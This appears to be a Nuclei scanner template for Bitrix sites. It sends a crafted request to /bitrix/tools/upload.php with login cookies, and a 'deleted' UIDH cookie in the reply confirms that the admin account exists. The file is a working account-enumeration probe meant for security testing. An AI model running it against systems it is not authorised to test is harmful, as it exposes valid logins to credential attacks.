id: Bitrix-Account-Enumeration_UIDH_login_admin

info:
  name: Bitrix Account Enumeration ( UIDH ) login:admin 
  author: crth0
  severity: medium
  reference: https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf
  tags: admin,bitrix


requests:
  - raw:
      - |
        GET /bitrix/tools/upload.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cookie: BITRIX_SM_UIDL=admin; BITRIX_SM_UIDH=1;
    extractors:
      - type: regex
        part: header
        regex:
          - 'Set-Cookie: BITRIX_SM_UIDH=deleted;'
